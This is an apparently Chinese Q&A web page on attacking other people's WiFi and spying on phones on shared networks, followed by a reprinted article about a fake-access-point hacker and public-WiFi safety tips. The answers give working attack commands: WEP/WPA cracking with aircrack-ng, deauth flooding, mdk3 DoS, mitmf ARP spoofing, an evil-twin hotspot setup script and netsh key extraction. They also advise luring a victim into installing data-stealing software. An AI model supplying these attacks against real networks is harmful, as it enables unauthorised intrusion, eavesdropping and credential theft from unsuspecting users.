怎么攻击别人wifi？

Posted 2023-04-07

1.保密性
我们攻击WIFI的第一个思路就是从保密性出发，我们希望从无线系统中获取用户的明文数据。首先，我们知道WIFI的的认证加密主要有以下四种方式：OPEN（无加密）、WEP（RC4）、WPA（TKIP）、WPA2（CCMP）。
OPEN的WIFI没有采取认证加密措施，任意用户均可链接WIFI，用户数据在BSS（基本服务集）中明文传输，恶意用户没有任何门槛就可连接，然后通过中间人攻击即可获取用户的数据（SSL、SSH等需要其他工具）。如下图所示：
WEP、WPA、WPA2认证加密模式的WIFI需要破解获取密码，然后通过中间人或直接嗅探的方式获取用户明文数据。步骤就不详述了，WEP抓取IVS包，WPA/WPA2抓取handshake包。
WEP大概如下：
airodump-ng --ivs -w /workspace/sniff/airmon --bssid AP的MAC -c AP的chanle wlan1mon #捕获ivs数据包
aireplay-ng -3 -b 目标AP的MAC -h 某一个连接该AP的station的MAC wlan1mon #发送ARP包获取加速获取ivs
aircrack-ng /workspace/sniff/airmon02.ivs
WPA/WPA2大概如下：
airodump-ng -w /workspace/sniff/airmon-wpa2 --bssid 目标AP的MAC -c AP所在chanle wlan1mon #嗅探无线数据，抓取handshake包
aireplay-ng -0 5 -a 目标AP的MAC -c 某一连接AP的station的MAC wlan1mon #发送deauth包，更快的获取handshake
aircrack-ng -w 你的字典文件 /workspace/sniff/airmon-wpa2.cap #破解wpa2密码
密码破解成功后即可连接AP，通过中间人的方式获取用户明文数据，或者直接用wireshark抓取加密包，然后通过airdecap-ng工具解密，然后用wireshark读取已经解密的数据包。
破解WPA、WPA2不一定成功，取决于你字典是否强大，此时我们可以想办法诱骗用户主动输入WIFI密码，比如我们创建一个和目标AP具有同样ESSID的软AP，用户可以连接上，单在浏览网页时会弹出一个虚假的认证页面，告诉用户必须输入WIFI的密码，用户只要输入密码我们即可获取。可以利用fluxion、wifiphisher等工具实现。
wifiphisher将用户输入的密码当做WIFI的密码，但此密码并没有去验证，如果用户输入错误，也会提示出该密码。
而fluxion会将用户输入的密码与handshake校验，成功方认为获取到密码。
2.可用性
通过使目标用户无法使用WIFI来破坏无线系统的可用性，通常通过DOS攻击来实现，比如发送大量的deauth包来迫使用户station与AP解除认证、连接。
aireplay -0 100 -a 目标AP的MAC -c攻击的station的MAC wlan1mon #发送大量的deauth包，迫使目标station无法连接AP
mdk3 wlan1mon a -a 攻击AP的MAC #mdk3可以伪造大量的station与AP连接，从而耗尽AP的资源造成DOS攻击
3.真实性
（1）恶意用户进入无线系统后，可通过中间人攻击获取或修改用户数据。
ARP欺骗或DNS欺骗，ettercap工具非常方便。下面采用mitmf工具通过ARP欺骗将目标浏览网页中的所有图片上下颠倒。
mitmf -i wlan0 --spoof --arp --gateway 192.168.2.1 --target 192.168.2.1 --upsidedownternet
通过driftnet工具抓取目标浏览网页时的图片
driftnet -i wlan0
当然还可以利用中间人攻击做很多事情，比如获取cookie，嵌入js，结合beef进一步攻击等等。。。
（2）伪造AP进行钓鱼攻击
airbase -ng -e airmon wlan1mon #创建钓鱼热点
然后通过下面的脚本开启dhcp服务器（必须先安装isc-dhcp-server），开启路由，开启系统转发，开启防火墙nat等。
1 #!/bin/bash 2 3 echo '配置钓鱼热点...' 4 5 service isc-dhcp-server stop 6 rm /var/lib/dhcp/dhcpd.leases 7 touch /var/lib/dhcp/dhcpd.leases 8 9 ifconfig at0 up10 ifconfig at0 10.0.0.1 netmask 255.255.255.011 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.112 sysctl net.ipv4.ip_forward=113 14 dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at015 echo '等待启动dhcp服务器...'16 sleep 517 service isc-dhcp-server start18 19 iptables -F20 iptables -t nat -F21 22 #iptables -P FORWARD ACCEPT23 iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE

此时用户可以不用密码即可连接airmon热点，并可以上网，但此时可以通过嗅探at0网卡获取用户数据。
4.完整性
篡改用户数据，在WIFI攻击这块貌似用处不大。
5.不可抵赖性 参考技术A 用cmd输入：netsh wlan show profile
之后会有几个wife名称
选你想要“攻击的”在输入：netsh wlan show profile name="想攻击的名称" key=clear
安全设置的关键内容就是密码
（此方法只用于连过“你想攻击”的wife）
在别人家不好意思连wife的时候可以用
（不客气） 参考技术B 把他的猫砸了！ 参考技术C 首先~~你得破解别人的WIFI无线的密码，其次，进入路由管理界面，你还得破解别人路由的管理密码~~最后，就算这些密码你都有了。。。。。别人一个路由恢复~你还是啥都没了。。。你说，你攻击个WIFI干啥呢？ 参考技术D PC上用CMD来攻击，只说这东西只有黑客会，平常人就别想了吧。

别人用手机连接了局域网内的 wifi,怎么窥视到手机中的信息数据？？

同在一个网络内 可以使用那些黑客软件 ？？？

使用抓包软件，具体百度，抓到数据包，分析。
给他发链接，让他安装，然后软件会自动发送手机的全部数据给你
高级黑客，直接入侵

大家看下这个例子：

随着移动终端的兴起和互联网技术的不断进步，古老的盗窃、诈骗、骚扰手段也是旧貌换了新颜。我们身边有多少人知道WIFI并不安全?你没看错，就是这个问题。使用WIFI上网时我们的个人信息安全时刻存在着巨大的风险和隐患。一起听听这位荷兰记者的讲述，来了解一下黑客是如何做到利用虚假接入点轻而易举就窃取了你个人信息的吧!

黑客Wouter走进一家咖啡馆，优雅的点了杯卡布奇诺。20分钟之后。他已经知道咖啡馆里每个人的出生地、来自哪所学校以及他们在搜索引擎上最近浏览的内容……

我是偶然在阿姆斯特丹市中心的一家咖啡馆与Wouter认识的。Wouter Slotboom，34岁，是一名黑客。在他的双肩包里，永远都装着一部只有烟盒大小并且配有天线的黑色装置。Wouter Slotboom向我演示了黑客是如何截获那些使用公共WiFi用户的个人信息的：那天阳光明媚，咖啡馆里几乎坐满了人。有的人在聊天、有的人在上网、有的人在玩手机……Wouter找了一个位置坐下，从背包里拿出了他的笔记本电脑和黑色装置。点了两杯咖啡并向服务员索取了咖啡馆里的公共WiFi密码。

一切已经准备妥当，黑客行动即将上演。

前戏

Wouter打开了他的电脑，下载了几个程序，不一会屏幕上出现的全是绿色的文本行。很快我就明白了，此时咖啡馆里的所有正在上网的设备都已连接到了Wouter的设备上，包括笔记本电脑、智能手机、平板电脑等。

在Wouter的电脑屏幕上出现了诸如iPhone Joris、Simone’s MacBook等的字样。后来我才明白，Wouter使用的黑色装置上的天线可以拦截所有发送到周围笔记本、智能手机和平板电脑上的信号。接下来，更多的文本开始在屏幕上滚动，我甚至可以看到先前连接到公共WiFi的设备。

Wouter黑进一位名为Joris的账户，发现他曾去过麦当劳、去西班牙度过假(因为里面有很多西班牙语的网站)、参加过赛车比赛(访问过当地很著名的赛车中心网站)。Martin，另一个咖啡店的顾客，他登陆过希斯罗机场和美国西南航空公司的网站，可能住在阿姆斯特丹的白色郁金香旅馆，他还去过一个叫做The Bulldog的咖啡店。

虚假接入点

服务员端来了咖啡并递给我们咖啡店的WiFi密码。Wouter连上WiFi之后，所有咖啡店里的上网流量都重定向转到了他的黑色装置上。大部分的智能手机、笔记本电脑和平板电脑都可以自动搜索并连接WiFi网络，而且它们会优先选择之前已经连接过的无线网络。例如，如果你之前已经登录过T-Mobile无线网络，你的设备就会在这一区域内自动搜索有没有T-Mobile。

在他给我的演示中，最令我吃惊的是列表中居然出现了我的上网记录。里面包括我的家庭网络名称、公司的网络名称、还有我去过的咖啡馆、酒店、火车站和其他公共场所的名字。天哪，我的记录居然被他一览无余，太恐怖了!

他设置了一个诱骗用户连接的虚假接入点名称。不一会就有差不多20个用户连接了我们的虚假接入点。现在如果Wouter想做什么的话，那对他来说就是小菜一碟，完全不费吹灰之力。比如，他完全可以检索到他人的密码，个人身份信息，银行账户等。但他没有这么做，因为它是一个有道德的黑客。

现在越来越多的人使用便携式设备，如笔记本电脑、平板电脑和智能手机，这也就意味着对公共无线网络的需求也在进一步的加大。无线网络是一把双刃剑，在使用它带来便利的同时也给我们带来了很多的不安全。只要使用公共WiFi上网的就有可能被黑客攻击，这是无可避免的。

窃取姓名、密码和私人信息

我们转站到了另一家以艺术拿铁咖啡著称的咖啡屋，这里到处都是自由职业者，他们各个都在玩弄着自己的笔记本电脑。Wouter打开他的装备开始了和上一家类似的活动。一会之后就有很多的设备连接到了我们的虚假接入点，我们可以清楚的看到他们Mac设备地址、登录历史、设备主人姓名等信息。在我的要求下，他准备进行更进一步的行动。

他打开了另一个应用程序，它可以提取用户更多的信息：比如他们使用的操作系统和版本信息。通过观察我们发现这些设备使用的都不是最新的系统，而Wouter恰好又知道这些系统的漏洞在哪里。对于大部分的黑客来说，如果他知道了这些系统的漏洞，那么他就可以随意的控制这台设备，从而窃取用户的私人信息。

在Wouter的设备上我们可以看到有人在用Mac浏览Nu.nl.网站;有人在用WeTransfer发送文件;有人在登录Dropbox;有人在登录FourSquare等等。还可以窥探到更私密的信息，如我们发现一个iPhone5s的用户，而在他的手机上居然安装了基友约会的APP。

窃取学习、爱好和人际关系

为了保护我们的隐私，我们所知道的大部分APP、应用程序、网站和一些其他类型的软件都使用了加密技术。但是一旦受害者接入到了Wouter的虚假接入点，那么他的密码就会被Wouter通过解密软件破解，受害者也就没有私密信息可言了。

我们还发现了一位女士，我们利用得到的名字Google了一下，然后在咖啡店里找到了她，通过获取的信息，我们得知这个姑娘出生于其他欧洲国家，最近来到荷兰，通过她的上网记录，得知她正在学荷兰语和荷兰国情课，喜欢练瑜伽，刚从泰国和老挝旅游回来，对维持住自己目前的恋爱关系十分在意……

Wouter还给我演示了一些其他的黑客小技巧。他可以用他手机上的APP去改变任意网站上特定的字。例如，他把网站上的Opstelten字样替换成了Dutroux字样，那么当你打开相关网页时，上面就会出现Dutroux而不是之前的Opstelten了。这看起来是很搞笑很滑稽的一件事，但是经常被用来进行钓鱼攻击，下载一些儿童色情图片等不法信息。

FreeBuf科普：如何安全的使用公共WiFi?

看了上面的演示和描述，你是不是和我一样觉得公共WiFi很不安全?首先，我们建议大家不要轻易的使用公共WiFi。可是，这的确是一件很难做到的事儿，当我们在公共场所还想继续上网怎么办呢?这里给出几条建议：

1、尽量不使用可疑或未加密的WiFi网络

我们给出的建议是，如果想在公共场所继续上网，最安全的方法就是使用移动数据流量，虽然很贵，但是它是相对安全。并且注意不要连接可疑或未加密的Wifi。当然如果你想绝对的安全，很简单，那就完全不要使用公共WiFi网络。

2、使用虚拟专用网络(VPN)

如果你想使用公共WiFi，有且只有一个方法可以保护你的安全——使用虚拟专用网络(VPN)。VPN的意思就是让用户在公共网络上建立起专用的网络以进行加密通讯，它会将你的上网流量加密然后连接到到你的VPN主机上，然后通过VPN主机上网。这样一来，即便上网流量在公共场所被截获，黑客破解起来也非常困难。

3、尽量使用HTTPS协议登录网站

HTTPS协议通过建立一个信息安全通道保证数据传输的安全。FreeBuf建议在公共WiFi环境下尽量不要登录诸如网上银行、支付宝等重要账户。

4、关闭WiFi默认连接

关闭WiFi开关，确保你的智能手机、平板、笔记本电脑不会默认连接无线WiFi网络。

编后：在公共场合“蹭”免费WiFi时，你可有意识到周边“黑客”的入侵?有数据表明，89%的公共无线网络热点是不安全的。我们常去的商场、机场、地铁站、图书馆、咖啡厅这些地方提供的WIFI热点方便我们的同时，也开放了网络黑客的入口。连接公共WiFi，最好仔细甄别WiFi来源，确认WiFi信号来源的可靠性。毕竟这关乎到我们的网银、支付宝密码等等……今后大家再“蹭网”的时候还是小心为妙呀!（来源：IT时代周刊）

手机版地址：http://m.haokoo.com/mobi/view/1187412.html 参考技术A

亲，你要窥探别人手机数据只有两种方法

使用抓包软件，具体百度，抓到数据包，分析。

给他发链接，让他安装，然后软件会自动发送手机的全部数据给你，这个靠你的本事去忽悠他吧

高级黑客，直接入侵，只能说你不会的。设计到很多语言和字典等。

本回答被提问者和网友采纳